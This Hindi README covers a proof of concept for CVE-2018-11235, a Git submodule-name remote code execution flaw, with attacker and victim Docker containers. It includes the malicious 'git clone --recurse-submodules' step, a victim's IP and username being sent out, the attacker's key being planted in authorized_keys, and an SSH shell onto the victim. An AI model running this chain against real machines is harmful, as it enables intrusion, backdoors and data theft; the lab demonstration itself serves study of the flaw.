
प्रूफ ऑफ कॉन्सेप्ट - RCE शोषण : Git सबमॉड्यूल के नामों की कमजोरी - Ensimag नवंबर 2018
डॉकर कंटेनर build करने के लिए, उपयोग करें :
make docker
(निम्नलिखित make कमांड को आपकी मशीन के विभिन्न टर्मिनलों पर समानांतर में चलाया जाना चाहिए)
हमलावर सर्वर कंटेनर को शुरू करने के लिए, उपयोग करें :
make run_server
पीड़ित का प्रतिनिधित्व करने वाले कंटेनर को शुरू करने के लिए, उपयोग करें :
make run_client
कंटेनर client.py स्क्रिप्ट चलाएगा। स्क्रिप्ट हैकर को अपना IP पता और उपयोगकर्ता नाम भेजेगा।
दुर्भावनापूर्ण git रिपॉजिटरी को क्लोन करने के लिए क्लाइंट कंसोल के निर्देशों का पालन करें।
git clone --recurse-submodules root@server:home/poc/malicious_repo client_pwned
आप देखेंगे कि पीड़ित का IP पता और उपयोगकर्ता नाम सर्वर को भेज दिया गया है।
क्लोन के बाद, जाँचें कि हमलावरों की सार्वजनिक कुंजी क्लाइंट की authorized_keys में सही ढंग से जोड़ी गई है।
इसके बाद, आप निम्नलिखित कमांड का उपयोग करके सर्वर से क्लाइंट पर एक शेल खोल सकते हैं (अपनी मशीन पर निष्पादित करें):
make server_bash
ssh <transmitted_username>@<transmitted_host>यदि आपको इस Proof of Concept को निष्पादित करने में कोई समस्या होती है, तो कृपया इस रिपॉजिटरी पर एक issue बनाएँ: https://github.com/ygouzerh/CVE-2018-11235/issues , हम आपको यथाशीघ्र उत्तर देंगे।